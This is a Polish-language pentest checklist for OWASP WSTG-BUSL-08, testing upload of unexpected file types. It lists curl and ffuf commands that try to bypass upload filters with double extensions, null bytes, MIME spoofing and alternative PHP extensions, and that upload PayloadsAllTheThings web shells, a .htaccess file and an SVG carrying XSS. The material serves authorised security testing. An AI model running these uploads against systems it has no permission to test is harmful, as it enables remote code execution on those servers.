================================================================================
WSTG-BUSL-08 — Test Upload of Unexpected File Types
================================================================================
CELE:
- Przetestowac odrzucanie nieoczekiwanych typow plikow
- Sprawdzic bezpieczna obsluge przeslanych plikow

================================================================================
KOMENDY
================================================================================

# --- Upload roznych typow plikow ---
curl -v -X POST TARGET/api/upload -F "file=@test.html;type=text/html"
curl -v -X POST TARGET/api/upload -F "file=@test.php;type=application/x-php"
curl -v -X POST TARGET/api/upload -F "file=@test.exe;type=application/x-msdownload"
curl -v -X POST TARGET/api/upload -F "file=@test.jsp;type=application/jsp"
curl -v -X POST TARGET/api/upload -F "file=@test.svg;type=image/svg+xml"

# --- Upload z podwojnymi rozszerzeniami ---
curl -v -X POST TARGET/api/upload -F "file=@shell.php.jpg;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@shell.jpg.php;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.php.png;type=image/png"
curl -v -X POST TARGET/api/upload -F "file=@test.asp.jpg;type=image/jpeg"

# --- Upload z null byte w nazwie pliku ---
curl -v -X POST TARGET/api/upload -F "file=@test.php%00.jpg;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.php\x00.jpg;type=image/jpeg"

# --- Upload z alternatywnymi rozszerzeniami PHP ---
curl -v -X POST TARGET/api/upload -F "file=@test.phtml;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.pht;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.php3;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.php4;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.php5;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.php7;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.phps;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.phar;type=image/jpeg"

# --- Upload z manipulacja MIME type ---
curl -v -X POST TARGET/api/upload -F "file=@shell.php;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@shell.php;type=image/png"
curl -v -X POST TARGET/api/upload -F "file=@shell.php;type=image/gif"

# --- Upload z case manipulation ---
curl -v -X POST TARGET/api/upload -F "file=@test.PhP;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.pHP;type=image/jpeg"
curl -v -X POST TARGET/api/upload -F "file=@test.Php;type=image/jpeg"

# --- Upload .htaccess ---
curl -v -X POST TARGET/api/upload -F "file=@.htaccess;type=text/plain"

# --- Upload SVG z XSS ---
curl -v -X POST TARGET/api/upload -F "file=@xss.svg;type=image/svg+xml"

================================================================================
KOMENDY Z WORDLISTAMI
================================================================================

# --- Fuzzowanie rozszerzen plikow (fuzzdb file-upload) ---
# PHP filter bypass:
# Uzyj listy rozszerzen z:
# Desktop/WSTG/fuzzdb-master/attack/file-upload/alt-extensions-php.txt
ffuf -u TARGET/api/upload -X POST -F "file=@shell.FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/file-upload/alt-extensions-php.txt -mc all -c

# --- ASP filter bypass ---
ffuf -u TARGET/api/upload -X POST -F "file=@shell.FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/file-upload/alt-extensions-asp.txt -mc all -c

# --- JSP filter bypass ---
ffuf -u TARGET/api/upload -X POST -F "file=@shell.FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/file-upload/alt-extensions-jsp.txt -mc all -c

# --- Generic file upload filter bypass ---
ffuf -u TARGET/api/upload -X POST -F "file=@shell.FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt -mc all -c

# --- PHP platform specific bypass ---
ffuf -u TARGET/api/upload -X POST -F "file=@shell.FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/file-upload/file-ul-filter-bypass-x-platform-php.txt -mc all -c

# --- Microsoft platform bypass ---
ffuf -u TARGET/api/upload -X POST -F "file=@shell.FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt -mc all -c

# --- Commonly writable directories ---
# Referencja: Desktop/WSTG/fuzzdb-master/attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt

# --- Invalid filenames (bypass) ---
# Linux: Desktop/WSTG/fuzzdb-master/attack/file-upload/invalid-filenames-linux.txt
# Microsoft: Desktop/WSTG/fuzzdb-master/attack/file-upload/invalid-filenames-microsoft.txt

# --- PayloadsAllTheThings - PHP upload shells ---
# Testuj pliki z: Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Extension PHP/
# Przyklad:
curl -v -X POST TARGET/api/upload -F "file=@Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Extension PHP/shell.php"
curl -v -X POST TARGET/api/upload -F "file=@Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Extension PHP/shell.phtml"
curl -v -X POST TARGET/api/upload -F "file=@Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Extension PHP/shell.phar"

# --- PayloadsAllTheThings - ASP upload shells ---
curl -v -X POST TARGET/api/upload -F "file=@Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Extension ASP/shell.asp"
curl -v -X POST TARGET/api/upload -F "file=@Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Extension ASP/shell.aspx"

# --- PayloadsAllTheThings - konfiguracje serwerowe ---
# Apache .htaccess:
# Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Configuration Apache .htaccess/
# IIS web.config:
# Desktop/WSTG/PayloadsAllTheThings-master/Upload Insecure Files/Configuration IIS web.config/

================================================================================
WERYFIKACJA MANUALNA (Burp Suite / Przegladarka / DevTools)
================================================================================
1. W Burp Suite -> Repeater: modyfikuj Content-Type header i rozszerzenie pliku
2. Testuj upload z roznych przegladarek (rozne zachowania)
3. Sprawdz gdzie przesylane pliki sa przechowywane i czy sa dostepne publicznie
4. Sprawdz czy serwer sprawdza magic bytes (file signature) a nie tylko rozszerzenie
5. Testuj upload .svg z JavaScript (XSS przez SVG)
6. Testuj upload .html z JavaScript
7. Sprawdz maksymalny rozmiar pliku i zachowanie przy jego przekroczeniu
